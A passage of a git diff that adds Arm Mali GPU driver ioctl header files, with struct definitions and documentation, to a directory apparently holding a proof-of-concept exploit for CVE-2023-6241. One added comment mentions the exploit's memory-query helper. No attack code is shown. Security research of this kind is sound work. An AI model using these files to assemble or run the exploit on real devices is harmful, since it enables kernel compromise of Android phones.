+ */ +struct kbase_ioctl_cs_queue_register { + __u64 buffer_gpu_addr; + __u32 buffer_size; + __u8 priority; + __u8 padding[3]; +}; + +#define KBASE_IOCTL_CS_QUEUE_REGISTER \ + _IOW(KBASE_IOCTL_TYPE, 36, struct kbase_ioctl_cs_queue_register) + +/** + * struct kbase_ioctl_cs_queue_kick - Kick the GPU command queue group scheduler + * to notify that a queue has been updated + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + */ +struct kbase_ioctl_cs_queue_kick { + __u64 buffer_gpu_addr; +}; + +#define KBASE_IOCTL_CS_QUEUE_KICK \ + _IOW(KBASE_IOCTL_TYPE, 37, struct kbase_ioctl_cs_queue_kick) + +/** + * union kbase_ioctl_cs_queue_bind - Bind a GPU command queue to a group + * + * @in: Input parameters + * @in.buffer_gpu_addr: GPU address of the buffer backing the queue + * @in.group_handle: Handle of the group to which the queue should be bound + * @in.csi_index: Index of the CSF interface the queue should be bound to + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.mmap_handle: Handle to be used for creating the mapping of CS + * input/output pages + */ +union kbase_ioctl_cs_queue_bind { + struct { + __u64 buffer_gpu_addr; + __u8 group_handle; + __u8 csi_index; + __u8 padding[6]; + } in; + struct { + __u64 mmap_handle; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_BIND \ + _IOWR(KBASE_IOCTL_TYPE, 39, union kbase_ioctl_cs_queue_bind) + +/** + * struct kbase_ioctl_cs_queue_register_ex - Register a GPU command queue with the + * base back-end in extended format, + * involving trace buffer configuration + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + * @buffer_size: Size of the buffer in bytes + * @priority: Priority of the queue within a group when run within a process + * @padding: Currently unused, must be zero + * @ex_offset_var_addr: GPU address of the trace buffer write offset variable + * @ex_buffer_base: Trace buffer GPU base address for the queue + * @ex_buffer_size: Size of the trace buffer in bytes + * @ex_event_size: Trace event write size, in log2 designation + * @ex_event_state: Trace event states configuration + * @ex_padding: Currently unused, must be zero + * + * Note: There is an identical sub-section at the start of this struct to that + * of @ref kbase_ioctl_cs_queue_register. Any change of this sub-section + * must also be mirrored to the latter. Following the said sub-section, + * the remaining fields forms the extension, marked with ex_*. + */ +struct kbase_ioctl_cs_queue_register_ex { + __u64 buffer_gpu_addr; + __u32 buffer_size; + __u8 priority; + __u8 padding[3]; + __u64 ex_offset_var_addr; + __u64 ex_buffer_base; + __u32 ex_buffer_size; + __u8 ex_event_size; + __u8 ex_event_state; + __u8 ex_padding[2]; +}; + +#define KBASE_IOCTL_CS_QUEUE_REGISTER_EX \ + _IOW(KBASE_IOCTL_TYPE, 40, struct kbase_ioctl_cs_queue_register_ex) + +/** + * struct kbase_ioctl_cs_queue_terminate - Terminate a GPU command queue + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + */ +struct kbase_ioctl_cs_queue_terminate { + __u64 buffer_gpu_addr; +}; + +#define KBASE_IOCTL_CS_QUEUE_TERMINATE \ + _IOW(KBASE_IOCTL_TYPE, 41, struct kbase_ioctl_cs_queue_terminate) + +/** + * union kbase_ioctl_cs_queue_group_create_1_6 - Create a GPU command queue + * group + * @in: Input parameters + * @in.tiler_mask: Mask of tiler endpoints the group is allowed to use. + * @in.fragment_mask: Mask of fragment endpoints the group is allowed to use. 
+ * @in.compute_mask: Mask of compute endpoints the group is allowed to use. + * @in.cs_min: Minimum number of CSs required. + * @in.priority: Queue group's priority within a process. + * @in.tiler_max: Maximum number of tiler endpoints the group is allowed + * to use. + * @in.fragment_max: Maximum number of fragment endpoints the group is + * allowed to use. + * @in.compute_max: Maximum number of compute endpoints the group is allowed + * to use. + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.group_handle: Handle of a newly created queue group. + * @out.padding: Currently unused, must be zero + * @out.group_uid: UID of the queue group available to base. + */ +union kbase_ioctl_cs_queue_group_create_1_6 { + struct { + __u64 tiler_mask; + __u64 fragment_mask; + __u64 compute_mask; + __u8 cs_min; + __u8 priority; + __u8 tiler_max; + __u8 fragment_max; + __u8 compute_max; + __u8 padding[3]; + + } in; + struct { + __u8 group_handle; + __u8 padding[3]; + __u32 group_uid; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_CREATE_1_6 \ + _IOWR(KBASE_IOCTL_TYPE, 42, union kbase_ioctl_cs_queue_group_create_1_6) + +/** + * union kbase_ioctl_cs_queue_group_create - Create a GPU command queue group + * @in: Input parameters + * @in.tiler_mask: Mask of tiler endpoints the group is allowed to use. + * @in.fragment_mask: Mask of fragment endpoints the group is allowed to use. + * @in.compute_mask: Mask of compute endpoints the group is allowed to use. + * @in.cs_min: Minimum number of CSs required. + * @in.priority: Queue group's priority within a process. + * @in.tiler_max: Maximum number of tiler endpoints the group is allowed + * to use. + * @in.fragment_max: Maximum number of fragment endpoints the group is + * allowed to use. + * @in.compute_max: Maximum number of compute endpoints the group is allowed + * to use. + * @in.csi_handlers: Flags to signal that the application intends to use CSI + * exception handlers in some linear buffers to deal with + * the given exception types. + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.group_handle: Handle of a newly created queue group. + * @out.padding: Currently unused, must be zero + * @out.group_uid: UID of the queue group available to base. 
+ */ +union kbase_ioctl_cs_queue_group_create { + struct { + __u64 tiler_mask; + __u64 fragment_mask; + __u64 compute_mask; + __u8 cs_min; + __u8 priority; + __u8 tiler_max; + __u8 fragment_max; + __u8 compute_max; + __u8 csi_handlers; + __u8 padding[2]; + /** + * @in.reserved: Reserved + */ + __u64 reserved; + } in; + struct { + __u8 group_handle; + __u8 padding[3]; + __u32 group_uid; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_CREATE \ + _IOWR(KBASE_IOCTL_TYPE, 58, union kbase_ioctl_cs_queue_group_create) + +/** + * struct kbase_ioctl_cs_queue_group_term - Terminate a GPU command queue group + * + * @group_handle: Handle of the queue group to be terminated + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_cs_queue_group_term { + __u8 group_handle; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_TERMINATE \ + _IOW(KBASE_IOCTL_TYPE, 43, struct kbase_ioctl_cs_queue_group_term) + +#define KBASE_IOCTL_CS_EVENT_SIGNAL \ + _IO(KBASE_IOCTL_TYPE, 44) + +typedef __u8 base_kcpu_queue_id; /* We support up to 256 active KCPU queues */ + +/** + * struct kbase_ioctl_kcpu_queue_new - Create a KCPU command queue + * + * @id: ID of the new command queue returned by the kernel + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_new { + base_kcpu_queue_id id; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_CREATE \ + _IOR(KBASE_IOCTL_TYPE, 45, struct kbase_ioctl_kcpu_queue_new) + +/** + * struct kbase_ioctl_kcpu_queue_delete - Destroy a KCPU command queue + * + * @id: ID of the command queue to be destroyed + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_delete { + base_kcpu_queue_id id; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_DELETE \ + _IOW(KBASE_IOCTL_TYPE, 46, struct kbase_ioctl_kcpu_queue_delete) + +/** + * struct kbase_ioctl_kcpu_queue_enqueue - Enqueue commands into the KCPU queue + * + * @addr: Memory address of an array of struct base_kcpu_queue_command + * @nr_commands: Number of commands in the array + * @id: kcpu queue identifier, returned by KBASE_IOCTL_KCPU_QUEUE_CREATE ioctl + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_enqueue { + __u64 addr; + __u32 nr_commands; + base_kcpu_queue_id id; + __u8 padding[3]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_ENQUEUE \ + _IOW(KBASE_IOCTL_TYPE, 47, struct kbase_ioctl_kcpu_queue_enqueue) + +/** + * union kbase_ioctl_cs_tiler_heap_init - Initialize chunked tiler memory heap + * @in: Input parameters + * @in.chunk_size: Size of each chunk. + * @in.initial_chunks: Initial number of chunks that heap will be created with. + * @in.max_chunks: Maximum number of chunks that the heap is allowed to use. + * @in.target_in_flight: Number of render-passes that the driver should attempt to + * keep in flight for which allocation of new chunks is + * allowed. + * @in.group_id: Group ID to be used for physical allocations. + * @in.padding: Padding + * @in.buf_desc_va: Buffer descriptor GPU VA for tiler heap reclaims. + * @out: Output parameters + * @out.gpu_heap_va: GPU VA (virtual address) of Heap context that was set up + * for the heap. + * @out.first_chunk_va: GPU VA of the first chunk allocated for the heap, + * actually points to the header of heap chunk and not to + * the low address of free memory in the chunk. 
+ */ +union kbase_ioctl_cs_tiler_heap_init { + struct { + __u32 chunk_size; + __u32 initial_chunks; + __u32 max_chunks; + __u16 target_in_flight; + __u8 group_id; + __u8 padding; + __u64 buf_desc_va; + } in; + struct { + __u64 gpu_heap_va; + __u64 first_chunk_va; + } out; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_INIT \ + _IOWR(KBASE_IOCTL_TYPE, 48, union kbase_ioctl_cs_tiler_heap_init) + +/** + * union kbase_ioctl_cs_tiler_heap_init_1_13 - Initialize chunked tiler memory heap, + * earlier version upto 1.13 + * @in: Input parameters + * @in.chunk_size: Size of each chunk. + * @in.initial_chunks: Initial number of chunks that heap will be created with. + * @in.max_chunks: Maximum number of chunks that the heap is allowed to use. + * @in.target_in_flight: Number of render-passes that the driver should attempt to + * keep in flight for which allocation of new chunks is + * allowed. + * @in.group_id: Group ID to be used for physical allocations. + * @in.padding: Padding + * @out: Output parameters + * @out.gpu_heap_va: GPU VA (virtual address) of Heap context that was set up + * for the heap. + * @out.first_chunk_va: GPU VA of the first chunk allocated for the heap, + * actually points to the header of heap chunk and not to + * the low address of free memory in the chunk. + */ +union kbase_ioctl_cs_tiler_heap_init_1_13 { + struct { + __u32 chunk_size; + __u32 initial_chunks; + __u32 max_chunks; + __u16 target_in_flight; + __u8 group_id; + __u8 padding; + } in; + struct { + __u64 gpu_heap_va; + __u64 first_chunk_va; + } out; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_INIT_1_13 \ + _IOWR(KBASE_IOCTL_TYPE, 48, union kbase_ioctl_cs_tiler_heap_init_1_13) + +/** + * struct kbase_ioctl_cs_tiler_heap_term - Terminate a chunked tiler heap + * instance + * + * @gpu_heap_va: GPU VA of Heap context that was set up for the heap. + */ +struct kbase_ioctl_cs_tiler_heap_term { + __u64 gpu_heap_va; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_TERM \ + _IOW(KBASE_IOCTL_TYPE, 49, struct kbase_ioctl_cs_tiler_heap_term) + +/** + * union kbase_ioctl_cs_get_glb_iface - Request the global control block + * of CSF interface capabilities + * + * @in: Input parameters + * @in.max_group_num: The maximum number of groups to be read. Can be 0, in + * which case groups_ptr is unused. + * @in.max_total_stream_num: The maximum number of CSs to be read. Can be 0, in + * which case streams_ptr is unused. + * @in.groups_ptr: Pointer where to store all the group data (sequentially). + * @in.streams_ptr: Pointer where to store all the CS data (sequentially). + * @out: Output parameters + * @out.glb_version: Global interface version. + * @out.features: Bit mask of features (e.g. whether certain types of job + * can be suspended). + * @out.group_num: Number of CSGs supported. + * @out.prfcnt_size: Size of CSF performance counters, in bytes. Bits 31:16 + * hold the size of firmware performance counter data + * and 15:0 hold the size of hardware performance counter + * data. + * @out.total_stream_num: Total number of CSs, summed across all groups. + * @out.instr_features: Instrumentation features. Bits 7:4 hold the maximum + * size of events. Bits 3:0 hold the offset update rate. 
+ * (csf >= 1.1.0) + * + */ +union kbase_ioctl_cs_get_glb_iface { + struct { + __u32 max_group_num; + __u32 max_total_stream_num; + __u64 groups_ptr; + __u64 streams_ptr; + } in; + struct { + __u32 glb_version; + __u32 features; + __u32 group_num; + __u32 prfcnt_size; + __u32 total_stream_num; + __u32 instr_features; + } out; +}; + +#define KBASE_IOCTL_CS_GET_GLB_IFACE \ + _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_ioctl_cs_get_glb_iface) + +struct kbase_ioctl_cs_cpu_queue_info { + __u64 buffer; + __u64 size; +}; + +#define KBASE_IOCTL_VERSION_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check) + +#define KBASE_IOCTL_CS_CPU_QUEUE_DUMP \ + _IOW(KBASE_IOCTL_TYPE, 53, struct kbase_ioctl_cs_cpu_queue_info) + +/** + * union kbase_ioctl_mem_alloc_ex - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @in.fixed_address: The GPU virtual address requested for the allocation, + * if the allocation is using the BASE_MEM_FIXED flag. + * @in.extra: Space for extra parameters that may be added in the future. + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc_ex { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + __u64 fixed_address; + __u64 extra[3]; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC_EX _IOWR(KBASE_IOCTL_TYPE, 59, union kbase_ioctl_mem_alloc_ex) + +/** + * union kbase_ioctl_read_user_page - Read a register of USER page + * + * @in: Input parameters. + * @in.offset: Register offset in USER page. + * @in.padding: Padding to round up to a multiple of 8 bytes, must be zero. + * @out: Output parameters. + * @out.val_lo: Value of 32bit register or the 1st half of 64bit register to be read. + * @out.val_hi: Value of the 2nd half of 64bit register to be read. + */ +union kbase_ioctl_read_user_page { + struct { + __u32 offset; + __u32 padding; + } in; + struct { + __u32 val_lo; + __u32 val_hi; + } out; +}; + +#define KBASE_IOCTL_READ_USER_PAGE _IOWR(KBASE_IOCTL_TYPE, 60, union kbase_ioctl_read_user_page) + +#endif /* _UAPI_KBASE_CSF_IOCTL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_ioctl.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_ioctl.h new file mode 100644 index 0000000..9eaa83c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_ioctl.h @@ -0,0 +1,894 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2017-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. 
+ * + */ + +#ifndef _UAPI_KBASE_IOCTL_H_ +#define _UAPI_KBASE_IOCTL_H_ + +#ifdef __cpluscplus +extern "C" { +#endif + +#include +#include + +#include "mali_kbase_csf_ioctl.h" + +#define KBASE_IOCTL_TYPE 0x80 + +/** + * struct kbase_ioctl_set_flags - Set kernel context creation flags + * + * @create_flags: Flags - see base_context_create_flags + */ +struct kbase_ioctl_set_flags { + __u32 create_flags; +}; + +#define KBASE_IOCTL_SET_FLAGS \ + _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags) + +/** + * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel + * + * @buffer: Pointer to the buffer to store properties into + * @size: Size of the buffer + * @flags: Flags - must be zero for now + * + * The ioctl will return the number of bytes stored into @buffer or an error + * on failure (e.g. @size is too small). If @size is specified as 0 then no + * data will be written but the return value will be the number of bytes needed + * for all the properties. + * + * @flags may be used in the future to request a different format for the + * buffer. With @flags == 0 the following format is used. + * + * The buffer will be filled with pairs of values, a __u32 key identifying the + * property followed by the value. The size of the value is identified using + * the bottom bits of the key. The value then immediately followed the key and + * is tightly packed (there is no padding). All keys and values are + * little-endian. + * + * 00 = __u8 + * 01 = __u16 + * 10 = __u32 + * 11 = __u64 + */ +struct kbase_ioctl_get_gpuprops { + __u64 buffer; + __u32 size; + __u32 flags; +}; + +#define KBASE_IOCTL_GET_GPUPROPS \ + _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops) + +/** + * union kbase_ioctl_mem_alloc - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC \ + _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc) + +/** + * struct kbase_ioctl_mem_query - Query properties of a GPU memory region + * @in: Input parameters + * @in.gpu_addr: A GPU address contained within the region + * @in.query: The type of query + * @out: Output parameters + * @out.value: The result of the query + * + * Use a %KBASE_MEM_QUERY_xxx flag as input for @query. 
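+ *
+ * Illustrative example (not part of the upstream header): reading the number
+ * of pages currently backing a region, which is presumably how the exploit's
+ * get_mem_size() helper is implemented:
+ *
+ *   union kbase_ioctl_mem_query q = {0};
+ *   q.in.gpu_addr = gpu_va;                      // any GPU VA inside the region
+ *   q.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
+ *   if (ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &q) == 0)
+ *     committed_pages = q.out.value;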
+ */ +union kbase_ioctl_mem_query { + struct { + __u64 gpu_addr; + __u64 query; + } in; + struct { + __u64 value; + } out; +}; + +#define KBASE_IOCTL_MEM_QUERY \ + _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query) + +#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1) +#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2) +#define KBASE_MEM_QUERY_FLAGS ((__u64)3) + +/** + * struct kbase_ioctl_mem_free - Free a memory region + * @gpu_addr: Handle to the region to free + */ +struct kbase_ioctl_mem_free { + __u64 gpu_addr; +}; + +#define KBASE_IOCTL_MEM_FREE \ + _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free) + +/** + * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader + * @buffer_count: requested number of dumping buffers + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + * + * A fd is returned from the ioctl if successful, or a negative value on error + */ +struct kbase_ioctl_hwcnt_reader_setup { + __u32 buffer_count; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_READER_SETUP \ + _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup) + +/** + * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to. + * @data: Counter samples for the dummy model. + * @size: Size of the counter sample data. + * @padding: Padding. + */ +struct kbase_ioctl_hwcnt_values { + __u64 data; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_HWCNT_SET \ + _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values) + +/** + * struct kbase_ioctl_disjoint_query - Query the disjoint counter + * @counter: A counter of disjoint events in the kernel + */ +struct kbase_ioctl_disjoint_query { + __u32 counter; +}; + +#define KBASE_IOCTL_DISJOINT_QUERY \ + _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query) + +/** + * struct kbase_ioctl_get_ddk_version - Query the kernel version + * @version_buffer: Buffer to receive the kernel version string + * @size: Size of the buffer + * @padding: Padding + * + * The ioctl will return the number of bytes written into version_buffer + * (which includes a NULL byte) or a negative error code + * + * The ioctl request code has to be _IOW because the data in ioctl struct is + * being copied to the kernel, even though the kernel then writes out the + * version info to the buffer specified in the ioctl. + */ +struct kbase_ioctl_get_ddk_version { + __u64 version_buffer; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_GET_DDK_VERSION \ + _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version) + +/** + * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 10.2--11.4) + * @va_pages: Number of VA pages to reserve for JIT + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. 
+ */ +struct kbase_ioctl_mem_jit_init_10_2 { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2) + +/** + * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 11.5--11.19) + * @va_pages: Number of VA pages to reserve for JIT + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_11_5 { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5) + +/** + * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory + * allocator + * @va_pages: Number of GPU virtual address pages to reserve for just-in-time + * memory allocations + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * @phys_pages: Maximum number of physical pages to allocate just-in-time + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + */ +struct kbase_ioctl_mem_jit_init { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; + __u64 phys_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init) + +/** + * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory + * + * @handle: GPU memory handle (GPU VA) + * @user_addr: The address where it is mapped in user space + * @size: The number of bytes to synchronise + * @type: The direction to synchronise: 0 is sync to memory (clean), + * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants. 
+ * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_mem_sync { + __u64 handle; + __u64 user_addr; + __u64 size; + __u8 type; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_MEM_SYNC \ + _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync) + +/** + * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer + * + * @in: Input parameters + * @in.gpu_addr: The GPU address of the memory region + * @in.cpu_addr: The CPU address to locate + * @in.size: A size in bytes to validate is contained within the region + * @out: Output parameters + * @out.offset: The offset from the start of the memory region to @cpu_addr + */ +union kbase_ioctl_mem_find_cpu_offset { + struct { + __u64 gpu_addr; + __u64 cpu_addr; + __u64 size; + } in; + struct { + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset) + +/** + * struct kbase_ioctl_get_context_id - Get the kernel context ID + * + * @id: The kernel context ID + */ +struct kbase_ioctl_get_context_id { + __u32 id; +}; + +#define KBASE_IOCTL_GET_CONTEXT_ID \ + _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id) + +/** + * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd + * + * @flags: Flags + * + * The ioctl returns a file descriptor when successful + */ +struct kbase_ioctl_tlstream_acquire { + __u32 flags; +}; + +#define KBASE_IOCTL_TLSTREAM_ACQUIRE \ + _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire) + +#define KBASE_IOCTL_TLSTREAM_FLUSH \ + _IO(KBASE_IOCTL_TYPE, 19) + +/** + * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region + * + * @gpu_addr: The memory region to modify + * @pages: The number of physical pages that should be present + * + * The ioctl may return on the following error codes or 0 for success: + * -ENOMEM: Out of memory + * -EINVAL: Invalid arguments + */ +struct kbase_ioctl_mem_commit { + __u64 gpu_addr; + __u64 pages; +}; + +#define KBASE_IOCTL_MEM_COMMIT \ + _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit) + +/** + * union kbase_ioctl_mem_alias - Create an alias of memory regions + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.stride: Bytes between start of each memory region + * @in.nents: The number of regions to pack together into the alias + * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_alias { + struct { + __u64 flags; + __u64 stride; + __u64 nents; + __u64 aliasing_info; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_ALIAS \ + _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias) + +/** + * union kbase_ioctl_mem_import - Import memory for use by the GPU + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.phandle: Handle to the external memory + * @in.type: Type of external memory, see base_mem_import_type + * @in.padding: Amount of extra VA pages to append to the imported buffer + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_import { + struct { + __u64 flags; + __u64 phandle; + __u32 type; + __u32 padding; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + 
} out; +}; + +#define KBASE_IOCTL_MEM_IMPORT \ + _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import) + +/** + * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region + * @gpu_va: The GPU region to modify + * @flags: The new flags to set + * @mask: Mask of the flags to modify + */ +struct kbase_ioctl_mem_flags_change { + __u64 gpu_va; + __u64 flags; + __u64 mask; +}; + +#define KBASE_IOCTL_MEM_FLAGS_CHANGE \ + _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change) + +/** + * struct kbase_ioctl_stream_create - Create a synchronisation stream + * @name: A name to identify this stream. Must be NULL-terminated. + * + * Note that this is also called a "timeline", but is named stream to avoid + * confusion with other uses of the word. + * + * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes. + * + * The ioctl returns a file descriptor. + */ +struct kbase_ioctl_stream_create { + char name[32]; +}; + +#define KBASE_IOCTL_STREAM_CREATE \ + _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create) + +/** + * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence + * @fd: The file descriptor to validate + */ +struct kbase_ioctl_fence_validate { + int fd; +}; + +#define KBASE_IOCTL_FENCE_VALIDATE \ + _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate) + +/** + * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel + * @buffer: Pointer to the information + * @len: Length + * @padding: Padding + * + * The data provided is accessible through a debugfs file + */ +struct kbase_ioctl_mem_profile_add { + __u64 buffer; + __u32 len; + __u32 padding; +}; + +#define KBASE_IOCTL_MEM_PROFILE_ADD \ + _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add) + +/** + * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to map + */ +struct kbase_ioctl_sticky_resource_map { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_MAP \ + _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map) + +/** + * struct kbase_ioctl_sticky_resource_unmap - Unmap a resource mapped which was + * previously permanently mapped + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to unmap + */ +struct kbase_ioctl_sticky_resource_unmap { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \ + _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap) + +/** + * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of + * the GPU memory region for + * the given gpu address and + * the offset of that address + * into the region + * @in: Input parameters + * @in.gpu_addr: GPU virtual address + * @in.size: Size in bytes within the region + * @out: Output parameters + * @out.start: Address of the beginning of the memory region enclosing @gpu_addr + * for the length of @offset bytes + * @out.offset: The offset from the start of the memory region to @gpu_addr + */ +union kbase_ioctl_mem_find_gpu_start_and_offset { + struct { + __u64 gpu_addr; + 